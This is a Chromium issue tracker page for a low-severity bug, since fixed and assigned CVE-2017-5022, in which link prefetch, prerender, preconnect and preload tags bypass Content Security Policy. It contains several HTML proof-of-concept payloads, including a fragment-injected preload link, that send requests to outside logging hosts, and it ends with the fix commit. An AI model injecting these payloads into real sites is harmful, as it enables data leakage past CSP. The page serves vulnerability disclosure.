Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Issue 663620 Bypass unsafe-inline mode CSP
Starred by 3 users Reported by masa....@gmail.com, Nov 9 2016 Back to list
Status: Fixed
Owner:
Closed: Dec 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 2
Type: Bug-Security



Sign in to add a comment
UserAgent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36

Steps to reproduce the problem:
PoC 1:
<link rel="prefetch" href="http://linux.im/test_prefetch.jpg">  

PoC 2:
<link rel="prerender" href="http://linux.im">  

PoC 3:
<link rel="dns-prefetch" href="http://linux.im">  

PoC 4:
<link rel="preconnect" href="http://1.111asd1-testcsp.n0tr00t.com">  

PoC 5:
<link rel="preload" href="//linux.im/styles/other.css">  

What is the expected behavior?
Refused to load the  xxxxx

What went wrong?
send a request

Did this work before? N/A 

Chrome version: 54.0.2840.71  Channel: n/a
OS Version: 10.0
Flash Version: Shockwave Flash 23.0 r0

Author: evi1m0
Source: http://paper.seebug.org/91/
 
Components: Blink>SecurityFeature
Labels: Security_Severity-Low
Owner: mkwst@chromium.org
Hey mkwst@, would you mind taking a look at this one?
Comment 2 by mkwst@chromium.org, Nov 9 2016
Cc: mkwst@chromium.org
Owner: y...@yoav.ws
CSP doesn't restrict `prefetch`, `prerender`, `dns-prefetch`, or `preconnect`. It's arguable that it should (and we're talking some of those in https://github.com/w3c/webappsec-csp/issues/107, where your opinions would certainly be appreciated).

`preload` should require an `as` attribute, and apply policy accordingly. yoav@, can you take a look at whether that's happening?
Comment 3 by y...@yoav.ws, Nov 9 2016
preload should apply policy according to the `as` attribute. If that attribute is missing, the applied policy should be `connect-src`.

Is there a test case that shows that this is not happening?
Project Member Comment 4 by sheriffbot@chromium.org, Nov 9 2016
Status: Assigned
Comment 5 by masa....@gmail.com, Nov 10 2016
Attackers do not need to use the as attribute when attacking
Comment 6 by y...@yoav.ws, Nov 10 2016
True. Again, if that attribute is missing, the applied policy should be `connect-src`. If that's not the case, it's certainly a bug. Is this what you see? Do you have a test case that shows that?
Comment 7 by masa....@gmail.com, Nov 10 2016
See http://45.32.32.225/test.php

Content-Security-Policy:default-src 'self'; content-src 'none'; script-src 'self' 'unsafe-inline';

It can send a request to asd11111111a1121.vqn3j8.ceye.io .
Comment 8 by masa....@gmail.com, Nov 10 2016
PoC:
http://45.32.32.225/test2.php#<link rel=preload href=http://asd11111111a1121.vqn3j8.ceye.io/test.aaa>
Comment 9 by y...@yoav.ws, Nov 10 2016
Status: Started
Can recreate using my own test case. 
Labels: -OS-Windows Security_Impact-Stable OS-All
I assume this impacts stable - let me know if I'm mistaken.
Project Member Comment 11 by bugdroid1@chromium.org, Nov 15 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/872f27a9bceebb042082cd1b2f9043e5dd208200

commit 872f27a9bceebb042082cd1b2f9043e5dd208200
Author: yoav <yoav@yoav.ws>
Date: Tue Nov 15 10:07:46 2016

Apply connect-src for link preload with no `as` value

This fixes an issue where connect-src was not applied to preloaded resources, due to their Context.

BUG= 663620 

Review-Url: https://codereview.chromium.org/2491903002
Cr-Commit-Position: refs/heads/master@{#432158}

[modify] https://crrev.com/872f27a9bceebb042082cd1b2f9043e5dd208200/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicy.cpp
[modify] https://crrev.com/872f27a9bceebb042082cd1b2f9043e5dd208200/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicyTest.cpp

Project Member Comment 12 by bugdroid1@chromium.org, Nov 15 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/872f27a9bceebb042082cd1b2f9043e5dd208200

commit 872f27a9bceebb042082cd1b2f9043e5dd208200
Author: yoav <yoav@yoav.ws>
Date: Tue Nov 15 10:07:46 2016

Apply connect-src for link preload with no `as` value

This fixes an issue where connect-src was not applied to preloaded resources, due to their Context.

BUG= 663620 

Review-Url: https://codereview.chromium.org/2491903002
Cr-Commit-Position: refs/heads/master@{#432158}

[modify] https://crrev.com/872f27a9bceebb042082cd1b2f9043e5dd208200/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicy.cpp
[modify] https://crrev.com/872f27a9bceebb042082cd1b2f9043e5dd208200/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicyTest.cpp

Anything else to be done here, or can we mark as Fixed?
Labels: M-56
Status: Fixed
Project Member Comment 15 by sheriffbot@chromium.org, Dec 3 2016
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: Release-0-M56
Labels: CVE-2017-5022
Project Member Comment 18 by sheriffbot@chromium.org, Mar 11
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
 Issue 719242  has been merged into this issue.
Sign in to add a comment